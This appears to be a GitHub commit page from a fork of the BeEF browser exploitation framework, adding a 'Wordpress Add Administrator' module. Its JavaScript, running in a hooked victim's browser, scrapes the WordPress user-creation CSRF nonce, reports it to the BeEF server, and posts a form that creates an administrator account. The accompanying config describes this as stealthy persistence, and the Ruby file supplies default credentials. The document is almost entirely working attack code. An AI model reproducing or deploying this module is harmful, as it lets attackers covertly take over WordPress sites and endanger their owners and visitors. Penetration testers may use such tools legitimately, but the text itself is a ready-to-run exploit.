Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

added a WP module

Browse Source
This commit is contained in:
Daniel Reece
2015-08-31 23:49:32 +01:00
parent 1eb1be2adf
commit 99367bb619
3 changed files with 107 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

74
modules/exploits/wordpress_add_admin/command.js Normal file
View File

@@ -0,0 +1,74 @@
//
// Copyright (c) 2015 Daniel Reece - @HBRN8
//
beef.execute(function() {
function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }
function p(u, b){ x=new XMLHttpRequest(); x.open('POST',u,true); x.setRequestHeader("Content-type","application/x-www-form-urlencoded"); x.send(b); return x.responseText; }
/* Kept incase there is a valid reason to use forms over AJAX, I cant think of any.
function post(path, params, method) {
method = method || "post";
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
for(var key in params) {
if(params.hasOwnProperty(key)) {
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);
form.appendChild(hiddenField);
}
}
document.body.appendChild(form);
form.submit();
}
*/
var domail = '<%= @domail %>';
page = g("/wp-admin/user-new.php");
m = page.match(/\-user" value="(.*?)" \/><input/);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "CSRF nonce hijacked = " + m[1] +
"\nCreating admin... (<%== format_multiline(@user + ':' + @pass) %>)");
var blob = "action=createuser" +
"&_wpnonce_create-user=" + m[1] +
"&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" +
"&user_login=<%== format_multiline(@user) %>" +
"&email=<%== format_multiline(@email) %>" +
"&first_name=<%== format_multiline(@fname) %>" +
"&last_name=<%== format_multiline(@lname) %>" +
"&url=<%== format_multiline(@url) %>" +
"&pass1=<%== format_multiline(@pass) %>" +
"&pass2=<%== format_multiline(@pass) %>";
if (domail){
//Wordpress will mail regardless of param value if it exists.
blob = blob + "&send_password=1";
}
blob = blob + "&role=administrator&createuser=Add+New+User";
p("/wp-admin/user-new.php", blob);
/* Still cant think of any.
post('/wp-admin/user-new.php',
{action: 'createuser',
'_wpnonce_create-user': m[1],
_wp_http_referer: '%2Fwp-admin%2Fuser-new.php',
user_login: '<%== format_multiline(@user) %>',
email: '<%== format_multiline(@email) %>',
first_name: '<%== format_multiline(@fname) %>',
last_name: '<%== format_multiline(@lname) %>',
url: '<%== format_multiline(@url) %>',
pass1: '<%== format_multiline(@pass) %>',
pass2: '<%== format_multiline(@pass) %>',
send_password: '1',
role: 'administrator',
createuser: 'Add+New+User+'});
*/
});

14
modules/exploits/wordpress_add_admin/config.yaml Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2015 Daniel Reece - @HBRN8
#
beef:
module:
Wordpress_add_admin:
enable: true
category: "Persistence"
name: "Wordpress Add Administrator"
description: "This module stealthily adds a Wordpress administrator account"
authors: ["hiburn8 @hbrn8"]
target:
working: ["ALL"]

19
modules/exploits/wordpress_add_admin/module.rb Normal file
View File

@@ -0,0 +1,19 @@
#
# Copyright (c) 2015 Daniel Reece - @HBRN8
class Wordpress_add_admin < BeEF::Core::Command
def self.options
return [{'name'=>'user', 'ui_label' => 'Username:', 'value' => 'beef'},
{'name'=>'pass', 'ui_label' => 'Pwd:', 'value' => [*('a'..'z'),*('0'..'9')].shuffle[0,8].join},
{'name'=>'email', 'ui_label' => 'Email:', 'value' => ''},
{'name'=>'domail', 'type' => 'checkbox', 'ui_label' => 'Success mail?:', 'checked' => 'true'},
{'name'=>'url', 'ui_label' => 'Website:', 'value' => 'beefproject.com'},
{'name'=>'fname', 'ui_label' => 'FirstName:', 'value' => 'beef'},
{'name'=>'lname', 'ui_label' => 'LastName:', 'value' => 'project'}]
end
def post_execute
end
end